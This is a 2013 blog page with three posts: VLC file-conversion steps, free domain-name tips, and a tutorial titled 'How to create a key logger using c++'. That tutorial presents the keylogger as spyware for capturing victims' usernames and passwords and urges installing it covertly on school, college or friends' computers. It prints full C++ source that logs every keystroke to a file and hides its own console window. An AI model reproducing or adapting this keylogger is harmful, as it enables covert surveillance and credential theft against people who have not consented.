Pages

Showing posts with label abhishek pathak website. Show all posts
Showing posts with label abhishek pathak website. Show all posts

Thursday, 21 February 2013

How to use VLC Media Player as Media File Types Converter


How to use VLC Media Player as Media File Types Converter




A Music Player which supports many File Types is VLC media player.VLC can not used to Play just the mp3s and Video also be used to Convert the Media File Types.
So to use this just follow these steps :



11)   Open VLC Media Player.

22)    Click on Media and select Convert / Save (Ctrl+R ) Option.

33)    Now Add the Files by using Add Button on the new Window which appeared.

44)    Now Click on Convert / Save Button and this will Open an Another Window.

55)    Now select the Destination File and Profile ( Conversion Format ) as you wish dude.
 Finally Click on the Start Button to Begin the Conversion and it is done.

How to create a key logger using c++

How  to create a key logger using c++
Key logger is a BEST spyware program which can be used to get username and password of the victim to hack or enter in personal accounts .To create key logger using c++ COUNTINUE reading the post.
How we have to do for this?
We can install this spyware in our college, school or a friend's system and get usernames and passwords of the users.
Advantage of key logger is that it is very simple easy method and also the victim can't detect that we are hacking him or her to create key logger using c++ we need is c++ program and follow these simple steps :





Open the c++ compiler.
Go to file  >>  new  >>  source file.
Copy and paste the following keylogger code into blank work space :

#include using namespace std; #include #include int Save (int key_stroke, char *file);void Stealth();int main() {Stealth(); char i;while (1){for(i = 8; i <= 190; i++){if (GetAsyncKeyState(i) == -32767)Save (i,"LOG.txt");}}system ("PAUSE");return 0;}int Save (int key_stroke, char *file){if ( (key_stroke == 1) || (key_stroke == 2) )return 0;FILE *OUTPUT_FILE;OUTPUT_FILE = fopen(file, "a+");cout << key_stroke << endl;if (key_stroke == 8)fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); else if (key_stroke == 13)fprintf(OUTPUT_FILE, "%s", "\n"); else if (key_stroke == 32)fprintf(OUTPUT_FILE, "%s", " ");else if (key_stroke == VK_TAB) fprintf(OUTPUT_FILE, "%s", "[TAB]");else if (key_stroke == VK_SHIFT)fprintf(OUTPUT_FILE, "%s", "[SHIFT]");else if (key_stroke == VK_CONTROL)fprintf(OUTPUT_FILE, "%s", "[CONTROL]");else if (key_stroke == VK_ESCAPE)fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");else if (key_stroke == VK_END)fprintf(OUTPUT_FILE, "%s", "[END]");else if (key_stroke == VK_HOME)fprintf(OUTPUT_FILE, "%s", "[HOME]");else if (key_stroke == VK_LEFT)fprintf(OUTPUT_FILE, "%s", "[LEFT]");else if (key_stroke == VK_UP)fprintf(OUTPUT_FILE, "%s", "[UP]");else if (key_stroke == VK_RIGHT)fprintf(OUTPUT_FILE, "%s", "[RIGHT]");else if (key_stroke == VK_DOWN)fprintf(OUTPUT_FILE, "%s", "[DOWN]");else if (key_stroke == 190 || key_stroke == 110)fprintf(OUTPUT_FILE, "%s", ".");else fprintf(OUTPUT_FILE, "%s", &key_stroke);fclose (OUTPUT_FILE);return 0;}void Stealth(){HWND Stealth;AllocConsole();Stealth = FindWindowA("ConsoleWindowClass", NULL);ShowWindow(Stealth,0);}



Now compile the code . Now execute the program by pressing Ctrl + F10. Now the keylogger will run in the system. Whatever we type using keyboard would be stored in log.txt file in folder where we saved the file. Now if someone have physical access to college or school system, then copy the .exe file in that system and run on it.






Wednesday, 20 February 2013

How to make free Website free Domain name

How to make free Website free Domain name

You will not find free domains it costs money to register a good domain. If you are able to pay a nominal fee then http://www.godaddy.com would be best option.

Alternative methods,
If you not mind advertisements on your site Microsoft Office Live Basics offers a free domain name http://office.microsoft.com/en-us/office… The only thing is that it will include their logo and link to their service on your site. They are hoping to area a large share of the market by offering a free domain, hosting and 500MB of storage. It will require a credit card to verify your age whic is little bit complex for bignners.

You can also visit http://www.dot.tk/ and register a free domain name but it will end with in .tk rather than .com.

You could also try a free and good Web hosting site like http://www.freewebs.com and then use http://www.freedomain.co.nr/ to get a free sub domain. It will redirect the URL to your site without a long difficult Web address.